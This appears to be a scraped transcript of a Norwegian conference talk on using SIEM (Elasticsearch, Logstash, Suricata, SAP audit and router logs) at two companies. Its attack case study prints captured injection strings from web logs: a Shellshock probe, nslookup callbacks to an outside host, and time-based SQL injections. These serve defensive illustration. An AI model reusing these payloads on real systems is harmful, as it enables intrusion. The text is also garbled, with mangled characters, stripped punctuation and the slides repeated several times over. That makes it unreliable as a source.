2015 Global Security Information and Event Management (SIEM ...
Security Information and Event Management (SIEM) i praksis
Transcript of Security Information and Event Management (SIEM) i praksis
Security Information and Event Management (SIEM) i
praksisThomas Tinglum Zedge
Roger Skjetlein Basis Consulting
Om presentasjonen
Fortelle om praktisk bruk av SIEM i to forskjellige miljoslasher Dette er en teknisk gjennomgang Det er OK aring stille sposlashrsmaringl underveis
Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og
portaler +1000 noder og sap selvfoslashlgelig
Infrastruktur for 80M+ brukere verden over
Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd
To noe ulike scenarios
Elasticsearch
Indekserer data
Nesten real-time soslashkbare data ( forsinkelse 1 sec )
All data er i JSON formatet
Skalerer horisontalt
Bruker Apache Lucene biblioteket i bunn
Logstash
Log forwarder
Normalisere data
Sentralisert prosessering av logger
Soslashrger for samsvar i inn-data i elasticsearch
Datafelter i forskjellige log format har ulike navn
Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal
Logstashelastic indexerdatasrc_ip
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Om presentasjonen
Fortelle om praktisk bruk av SIEM i to forskjellige miljoslasher Dette er en teknisk gjennomgang Det er OK aring stille sposlashrsmaringl underveis
Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og
portaler +1000 noder og sap selvfoslashlgelig
Infrastruktur for 80M+ brukere verden over
Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd
To noe ulike scenarios
Elasticsearch
Indekserer data
Nesten real-time soslashkbare data ( forsinkelse 1 sec )
All data er i JSON formatet
Skalerer horisontalt
Bruker Apache Lucene biblioteket i bunn
Logstash
Log forwarder
Normalisere data
Sentralisert prosessering av logger
Soslashrger for samsvar i inn-data i elasticsearch
Datafelter i forskjellige log format har ulike navn
Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal
Logstashelastic indexerdatasrc_ip
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Hosting av spesial-loslashsninger Kundenes lsquoekstranettrsquo ogsaring i stor grad webloslashsninger og
portaler +1000 noder og sap selvfoslashlgelig
Infrastruktur for 80M+ brukere verden over
Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data mnd
To noe ulike scenarios
Elasticsearch
Indekserer data
Nesten real-time soslashkbare data ( forsinkelse 1 sec )
All data er i JSON formatet
Skalerer horisontalt
Bruker Apache Lucene biblioteket i bunn
Logstash
Log forwarder
Normalisere data
Sentralisert prosessering av logger
Soslashrger for samsvar i inn-data i elasticsearch
Datafelter i forskjellige log format har ulike navn
Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal
Logstashelastic indexerdatasrc_ip
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Elasticsearch
Indekserer data
Nesten real-time soslashkbare data ( forsinkelse 1 sec )
All data er i JSON formatet
Skalerer horisontalt
Bruker Apache Lucene biblioteket i bunn
Logstash
Log forwarder
Normalisere data
Sentralisert prosessering av logger
Soslashrger for samsvar i inn-data i elasticsearch
Datafelter i forskjellige log format har ulike navn
Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal
Logstashelastic indexerdatasrc_ip
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Logstash
Log forwarder
Normalisere data
Sentralisert prosessering av logger
Soslashrger for samsvar i inn-data i elasticsearch
Datafelter i forskjellige log format har ulike navn
Web server Client-IPBrannmur Source IPFil ftp_client_ipSAP client Terminal
Logstashelastic indexerdatasrc_ip
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Zedge SIEM arkitektur
Firewall
IDS
Logstash
Apper Heka
elastic indexerdata
Web
Storage
pf iptables
suricata
local file storage
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106
Router contrsquod
Brudd paring policy visualisert
Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Basis Consulting SIEM arkitektur
logstash
logstash
elastic indexerdata
kibana
proxy
elastic master
elastic client
system logs syslog receiver lumberjack receiver
acl normalising
election fault detection cluster state no master block
sap audit logs read access logs
data merge
customer environment
Ulike datakilder
IDS - Intrusion Detection System Suricata Snort Fail2ban
Web Apache NGINX IIS
FTP vsftpd sftp
Brannmur IPtables packetfilter Cisco ASA FortiGate
Epost Qmail postfix
SAP
IDS
Suricata - multitraringdet IDS
Regler paring protokoll
HTTP normalizer og parser
Overvaringkning opp til L7 OSI
Output JSON direkte
Web
Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen
Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul
Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip
Fil via SSL og SSH
Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner
Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes
Angrepsvektor reduseres med enkle midler som feks fail2ban
Distribuerte bruteforce sees relativt enkelt med SIEM
Geoip og plassering paring kart lar oss obeservere unormale hotspots
forsoslashk paring injections
Operativsystem
Eksempel paring brukerinnlogging fra brukeren icinga
Sjekk av volum
Sjekk av antall mail per koslash
Teller ogsaring antall ikke-leverte mails
Kan ta dette lenger ift spamhaus og maskinlaeligre
SAP
SAP - Systems Applications amp Products
Enkelt forklart haringndterer forretning penger HR varer logistikk etc
Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder
Tidskritisk dersom SAP benyttes ifm produksjon
Kritiske og sensitive data
SAP Security Audit Log
Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner
Visualisert Klassifisering kvantaDetalj eksakt type
SAP Router
Setter opp aksess mellom klient og sap infrastruktur
ACL regulert ift klient node og applikasjon
